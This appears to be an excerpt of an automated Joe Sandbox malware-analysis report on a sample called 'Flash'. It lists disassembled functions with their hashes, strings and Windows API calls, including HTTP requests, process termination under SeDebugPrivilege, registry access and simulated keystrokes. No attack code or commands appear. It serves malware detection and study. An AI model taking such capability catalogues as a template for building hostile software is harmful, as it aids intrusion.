                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                        • API String ID: 1924731296-2107944366
                                                        • Opcode ID: 862141114a4b9157b2c5edd5187b24541841ad850c86bc2831e626022037740b
                                                        • Instruction ID: 8055edc004c5f11516acde5f36e6d1a7e3baef76b8b93e4499c18a1f70377d67
                                                        • Opcode Fuzzy Hash: 862141114a4b9157b2c5edd5187b24541841ad850c86bc2831e626022037740b
                                                        • Instruction Fuzzy Hash: 66518D70618304AFDB00EF54CC55F6E77E5FB88311F10891AF995872E2DB70A989CB62
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A4211C
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A42148
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A4218A
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A4219F
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A421AC
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A421DC
                                                        • InternetCloseHandle.WININET(00000000), ref: 00A42223
                                                          • Part of subcall function 00A42B4F: GetLastError.KERNEL32(?,?,00A41EE3,00000000,00000000,00000001), ref: 00A42B64
                                                          • Part of subcall function 00A42B4F: SetEvent.KERNEL32(?,?,00A41EE3,00000000,00000000,00000001), ref: 00A42B79
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 2603140658-3916222277
                                                        • Opcode ID: 465be1c53d5ec22129d72fea1df982a5e0fee20668624cf37af6a42c2c5c49ad
                                                        • Instruction ID: b459702a3c52e094bd5a6299cd566f25460fcc183de93597cd5fccd54c9bce80
                                                        • Opcode Fuzzy Hash: 465be1c53d5ec22129d72fea1df982a5e0fee20668624cf37af6a42c2c5c49ad
                                                        • Instruction Fuzzy Hash: D6418EB5501608BFEB129F60CC89FFB7BACFF88350F404116FA059A141D7B0AE458BA0
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A60980), ref: 00A49412
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A60980), ref: 00A49446
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A495C0
                                                        • SysFreeString.OLEAUT32(?), ref: 00A495EA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 775af6b4c0d5183d476aa4b088d572ddbb68d563bc580ece5af72208afec394b
                                                        • Instruction ID: 35980e781c765feddc8e14c0700220c82d44fd074fb88e052238d737fd70af07
                                                        • Opcode Fuzzy Hash: 775af6b4c0d5183d476aa4b088d572ddbb68d563bc580ece5af72208afec394b
                                                        • Instruction Fuzzy Hash: 46F12975A00219EFCB14DF94C884EAFB7B9FF85315F108498F506AB261CB71AE56CB90
                                                        APIs
                                                          • Part of subcall function 00A34BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A33B8A,?), ref: 00A34BE0
                                                          • Part of subcall function 00A34BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A33B8A,?), ref: 00A34BF9
                                                          • Part of subcall function 00A34FEC: GetFileAttributesW.KERNEL32(?,00A33BFE), ref: 00A34FED
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A352FB
                                                        • _wcscmp.LIBCMT ref: 00A35315
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A35330
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 75d1c46f489ee966919f011bb944b9859add9d151488a9096a9334115b8c21b9
                                                        • Instruction ID: c32400af64671ccab56a110814ebb51ed6555fd36123dc236c559a66d37b9f47
                                                        • Opcode Fuzzy Hash: 75d1c46f489ee966919f011bb944b9859add9d151488a9096a9334115b8c21b9
                                                        • Instruction Fuzzy Hash: 875186B24087859BC724DBA4D881EDFB3EC9F84300F50492EF685C3152EF74A6888756
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A58D24
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: 22e6df36e029fe19bfbc9b33c4b08ea5ed7d2ec687cfa7c5d846dc14de00aa0d
                                                        • Instruction ID: 6875a86cbbd2223fcdeca14ebee035364c74eb2d9d3d95fa2397d6395672758e
                                                        • Opcode Fuzzy Hash: 22e6df36e029fe19bfbc9b33c4b08ea5ed7d2ec687cfa7c5d846dc14de00aa0d
                                                        • Instruction Fuzzy Hash: A051A330640204BFEF609B68CC85B5D7BB5BB15352F244512FD15F61E1CFB9E998CA60
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A0C638
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A0C65A
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A0C672
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A0C690
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A0C6B1
                                                        • DestroyIcon.USER32(00000000), ref: 00A0C6C0
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A0C6DD
                                                        • DestroyIcon.USER32(?), ref: 00A0C6EC
                                                          • Part of subcall function 00A5AAD4: DeleteObject.GDI32(00000000), ref: 00A5AB0D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: 40834d2c940131fc34c6b511a02c7849a5c2b4517f40e23ba9818062a2c00131
                                                        • Instruction ID: ca427330d629256f561d346416d3cc8303d9be734dd3c1b1596c70f0395cbb80
                                                        • Opcode Fuzzy Hash: 40834d2c940131fc34c6b511a02c7849a5c2b4517f40e23ba9818062a2c00131
                                                        • Instruction Fuzzy Hash: 70518F70640209AFDB20DF68DC85FAA77B5EB54720F108A19F942D72D0DBB1ED91DB60
                                                        APIs
                                                          • Part of subcall function 00A2B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A2B54D
                                                          • Part of subcall function 00A2B52D: GetCurrentThreadId.KERNEL32 ref: 00A2B554
                                                          • Part of subcall function 00A2B52D: AttachThreadInput.USER32(00000000,?,00A2A23B,?,00000001), ref: 00A2B55B
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A2A246
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A2A263
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00A2A266
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A2A26F
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A2A28D
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A2A290
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A2A299
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A2A2B0
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A2A2B3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: 8d45e6854d5248fc559b6ae2bc833782514f59abef037f7adf2d5ef66f594ce4
                                                        • Instruction ID: 89679aab35f80676b736109ce2c5f632eaafc5e4ed67c9fa03090bccd6bb2272
                                                        • Opcode Fuzzy Hash: 8d45e6854d5248fc559b6ae2bc833782514f59abef037f7adf2d5ef66f594ce4
                                                        • Instruction Fuzzy Hash: B911CEB1950218BFF610ABA4DC8AF6B3F2DEB4C750F100429F2406B0A0CAF25C919AB0
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A2915A,00000B00,?,?), ref: 00A294E2
                                                        • HeapAlloc.KERNEL32(00000000,?,00A2915A,00000B00,?,?), ref: 00A294E9
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A2915A,00000B00,?,?), ref: 00A294FE
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00A2915A,00000B00,?,?), ref: 00A29506
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A2915A,00000B00,?,?), ref: 00A29509
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A2915A,00000B00,?,?), ref: 00A29519
                                                        • GetCurrentProcess.KERNEL32(00A2915A,00000000,?,00A2915A,00000B00,?,?), ref: 00A29521
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A2915A,00000B00,?,?), ref: 00A29524
                                                        • CreateThread.KERNEL32(00000000,00000000,00A2954A,00000000,00000000,00000000), ref: 00A2953E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 39d8b75d60f91c335993f1cb05fba8c98db9d0ded0df46b22ab5c19fc28de737
                                                        • Instruction ID: 273956dd1ff3ee6cfed88470a93c43e2df291499a157f7b1b3752983e5138b40
                                                        • Opcode Fuzzy Hash: 39d8b75d60f91c335993f1cb05fba8c98db9d0ded0df46b22ab5c19fc28de737
                                                        • Instruction Fuzzy Hash: 2B01BBB5240304BFE711EFA5DC4DF6B7BACEB89711F004511FA05DB1A1CAB19845CB20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: c179c28887ff70322b1de9ae9a1ad63cc566d4ba3753db147bb1cc89d7cd19a2
                                                        • Instruction ID: 2e88f03b28a6a5e31ce1fa1a0bff7355b012fc19419337b7da65be8fa304f153
                                                        • Opcode Fuzzy Hash: c179c28887ff70322b1de9ae9a1ad63cc566d4ba3753db147bb1cc89d7cd19a2
                                                        • Instruction Fuzzy Hash: 88C1B379A4021A9FDF10DF98C984AAEB7B5FF98350F148429E905AB280E770ED45CB51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: 390b0767fa406831eb72dd84fdc4e764ff6d90f6e634d79a99fac8ac9a22fbc8
                                                        • Instruction ID: 57649471d68849440237bdfaec6a20151a9a9a480ae3fd969abd7da78af89303
                                                        • Opcode Fuzzy Hash: 390b0767fa406831eb72dd84fdc4e764ff6d90f6e634d79a99fac8ac9a22fbc8
                                                        • Instruction Fuzzy Hash: 8B91CE34A00219ABCF20CFA5C848FAFBBB8EF85710F10856EF515AB291D7709941CFA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A57449
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00A5745D
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A57477
                                                        • _wcscat.LIBCMT ref: 00A574D2
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A574E9
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A57517
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: 7acbed195d9eea71ba729a5a4552a02ea6cc7baff68524b017aa85ed5fe92e43
                                                        • Instruction ID: b033f6c5e9d810bfcdf08b77b617ae4b54769766c2a3211492f9cb856938ab5d
                                                        • Opcode Fuzzy Hash: 7acbed195d9eea71ba729a5a4552a02ea6cc7baff68524b017aa85ed5fe92e43
                                                        • Instruction Fuzzy Hash: 51419170A04308AFDB219FA4DC85FEE77B8FB48351F10442AF945A6291D6B19D898B60
                                                        APIs
                                                          • Part of subcall function 00A34148: CreateToolhelp32Snapshot.KERNEL32 ref: 00A3416D
                                                          • Part of subcall function 00A34148: Process32FirstW.KERNEL32(00000000,?), ref: 00A3417B
                                                          • Part of subcall function 00A34148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00A34245
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4F08D
                                                        • GetLastError.KERNEL32 ref: 00A4F0A0
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4F0CF
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A4F14C
                                                        • GetLastError.KERNEL32(00000000), ref: 00A4F157
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A4F18C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 1701285019-2896544425
                                                        • Opcode ID: a3bb63546ead00b2308044b436e02e0c7f7956274c35b29dce82a382f4a95726
                                                        • Instruction ID: 9f467587decf1388b11312c11933ffb44bfebefbef069793892ba1386b80d0d8
                                                        • Opcode Fuzzy Hash: a3bb63546ead00b2308044b436e02e0c7f7956274c35b29dce82a382f4a95726
                                                        • Instruction Fuzzy Hash: E241DA302402009FDB25EF68CCA5F6EB7B5AF84710F04852AF9028F3D2CBB4A945CB81
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00A3357C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 49ba1c4469a803e6bab7671513db0d25cf756283438e1d28dfd90c2372880478
                                                        • Instruction ID: b672efe42c5d8880e1a55e825f98076d9c266a207dc4678ccf86967d781f34bd
                                                        • Opcode Fuzzy Hash: 49ba1c4469a803e6bab7671513db0d25cf756283438e1d28dfd90c2372880478
                                                        • Instruction Fuzzy Hash: 5111DA7374C34ABEEF055B55DC96D7A77ACDF05764F20002AFA00AA181E7A9AF4057B0
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A34802
                                                        • LoadStringW.USER32(00000000), ref: 00A34809
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A3481F
                                                        • LoadStringW.USER32(00000000), ref: 00A34826
                                                        • _wprintf.LIBCMT ref: 00A3484C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A3486A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00A34847
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 67d48a5555516a1288c942021a3136160378fd8b8fe8ab1b3898f95057c1abb1
                                                        • Instruction ID: 0d824d91eb85d4cfde58318fe28eb3f74e005af480668b174c9a05492a43da27
                                                        • Opcode Fuzzy Hash: 67d48a5555516a1288c942021a3136160378fd8b8fe8ab1b3898f95057c1abb1
                                                        • Instruction Fuzzy Hash: 99012CF69002087BE711EBA0DE89EF7767CEB08300F400595F759E2041EAB4AE854B75
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00A5DB42
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00A5DB62
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A5DD9D
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A5DDBB
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A5DDDC
                                                        • ShowWindow.USER32(00000003,00000000), ref: 00A5DDFB
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00A5DE20
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00A5DE43
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID:
                                                        • API String ID: 1211466189-0
                                                        • Opcode ID: bbdf9801e995ca5719f1461e5e37bd7a6cce935619d9bddc224969223fab4d2d
                                                        • Instruction ID: b3841da34c9cbf0b70de3b35d846b034d9b33a0dc302a8ca39c2883daf6718fc
                                                        • Opcode Fuzzy Hash: bbdf9801e995ca5719f1461e5e37bd7a6cce935619d9bddc224969223fab4d2d
                                                        • Instruction Fuzzy Hash: 42B19A71600215EFDF24CF69C9C5BAE7BB1FF04702F088069EC489E295D775A994CBA0
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A5040D,?,?), ref: 00A51491
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A5044E
